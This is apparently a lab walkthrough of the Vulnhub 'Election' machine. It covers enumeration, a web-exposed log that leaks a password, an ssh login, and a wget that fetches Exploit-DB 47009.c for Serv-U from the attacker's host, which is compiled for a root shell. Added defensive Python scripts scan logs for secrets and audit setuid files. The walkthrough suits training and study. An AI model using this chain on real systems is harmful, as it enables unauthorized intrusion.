[VLN] eLection

Today we are going to hack the Vulnhub machine called Election. You can download it from the following link: Election

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 16:54 CEST
Nmap scan report for election.home (192.168.1.101)
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds

We take a look at the Apache server's robots.txt file, located at http://192.168.1.101/robots.txt. It contains the following:

admin
wordpress
user
election

We see there is a directory called "election", so we use gobuster to dig a little deeper.

~ > gobuster dir -u http://192.168.1.101/election -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.101/election
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/26 17:07:18 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/data (Status: 301)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/media (Status: 301)
/themes (Status: 301)
===============================================================
2020/07/26 17:07:22 Finished
===============================================================

It returns several directories; judging by the name, the most interesting one is admin. We run gobuster again.

~ > gobuster dir -u http://192.168.1.101/election/admin -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.101/election/admin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/26 17:08:03 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/ajax (Status: 301)
/components (Status: 301)
/css (Status: 301)
/img (Status: 301)
/inc (Status: 301)
/js (Status: 301)
/logs (Status: 301)
/plugins (Status: 301)
===============================================================
2020/07/26 17:08:06 Finished
===============================================================

The logs directory shows up! If we visit http://192.168.1.101/election/admin/logs/ we see a file called system.log. After downloading it, we find it contains:

[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

We can see some possible credentials: love/P@$$w0rd@123. Let's try connecting over ssh.
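As an added example, not part of the original write-up: a small scanner a defender could run over application logs such as this system.log to flag clear-text credentials before the file is ever exposed from a web directory. The sample lines are constructed in the same shape as the log above; the rules and field names are assumptions.

```python
import re

# Constructed sample, modelled on the system.log shown above (not the real file).
SAMPLE_LOG = """\
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2020-04-09 10:00:00] Issued reset token=7f3a9c0e for user alice
"""

# The application's line shape: "[timestamp] message".
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<msg>.*)$")

# Each rule captures the secret in the 'secret' group so it can be redacted.
SECRET_PATTERNS = {
    "assigned_password": re.compile(
        r"(?i)assigned password for the user (?P<user>\S+):\s*(?P<secret>\S+)"),
    "key_value_secret": re.compile(
        r"(?i)\b(?:password|passwd|pwd|token|secret|api[_-]?key)\s*[=:]\s*(?P<secret>\S+)"),
}

def scan_log(text):
    """Return one finding per line that carries a clear-text secret.

    Each finding holds the timestamp, the rule that fired, the user (when the
    rule captured one) and a redacted copy of the message safe to forward.
    """
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not in the "[timestamp] message" shape; skip it
        ts, msg = m.group("ts"), m.group("msg")
        for rule, pat in SECRET_PATTERNS.items():
            hit = pat.search(msg)
            if not hit:
                continue
            secret = hit.group("secret")
            findings.append({
                "timestamp": ts,
                "rule": rule,
                "user": hit.groupdict().get("user"),
                "redacted": msg.replace(secret, "[REDACTED]"),
            })
            break  # one finding per line is enough
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["timestamp"], f["rule"], f["user"], "->", f["redacted"])
```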

Low Shell



~ > ssh love@192.168.1.101
The authenticity of host '192.168.1.101 (192.168.1.101)' can't be established.
ECDSA key fingerprint is SHA256:erz9C9WEWhhV5KMnnpxYEiDQ015ORbFLU/4HNeyevdQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.101' (ECDSA) to the list of known hosts.
love@192.168.1.101's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr  9 23:19:28 2020 from 192.168.1.5
love@election:~$ 

We take a look around the system.

love@election:~$ find / -perm -4000 2>/dev/null
---SNIP---
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
/usr/lib/policykit-1/polkit-agent-helper-1
/bin/fusermount
---SNIP----

One executable stands out: "Serv-U". After some searching, we find an exploit[1] that may be useful. We download it on our machine and transfer it to the victim machine.
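As an added example, not from the original write-up: a baseline comparison a defender can run over the setuid list to flag files like /usr/local/Serv-U/Serv-U that no package owns. The baseline set is assumed (it would be recorded from a known-good install of the same image), and the sample input is the trimmed find output above.

```python
import os
import stat

# Constructed sample: the setuid list from the 'find / -perm -4000' run above.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
/usr/lib/policykit-1/polkit-agent-helper-1
/bin/fusermount
"""

# Assumed baseline: setuid files recorded from a known-good install of the
# same image. Keep one per image; anything outside it needs a documented reason.
BASELINE = {
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/sbin/pppd",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/bin/fusermount",
}

# Locations normally populated by hand rather than by the package manager.
HAND_INSTALLED = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")

def parse_find_output(text):
    """Turn 'find / -perm -4000' output into a set of paths."""
    return {line.strip() for line in text.splitlines() if line.strip()}

def collect_suid(root="/"):
    """Walk root and return the set of regular files with the setuid bit set."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or vanished while walking
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def audit_suid(present, baseline=BASELINE):
    """Return (unexpected, missing): unexpected is a list of (path, hand_installed)
    for setuid files absent from the baseline; missing lists baseline entries the
    host no longer has (removed or replaced binaries)."""
    unexpected = [(p, p.startswith(HAND_INSTALLED)) for p in sorted(present - baseline)]
    missing = sorted(baseline - present)
    return unexpected, missing
```

On a live host, pass collect_suid() to audit_suid() instead of the parsed sample.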

Privilege Escalation



love@election:~$ wget http://192.168.1.111/47009.c
--2020-07-26 20:51:47--  http://192.168.1.111/47009.c
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [application/octet-stream]
Saving to: ‘47009.c’

47009.c               100%[=========================>]     619  --.-KB/s    in 0s

2020-07-26 20:51:47 (85.6 MB/s) - ‘47009.c’ saved [619/619]

We compile it!

love@election:~$ gcc -o go 47009.c 

And run it :)

love@election:~$ ./go
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)

root.txt



# cd /root
# ls
root.txt
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6

End


And with that we are root on the machine.

[1] https://www.exploit-db.com/exploits/47009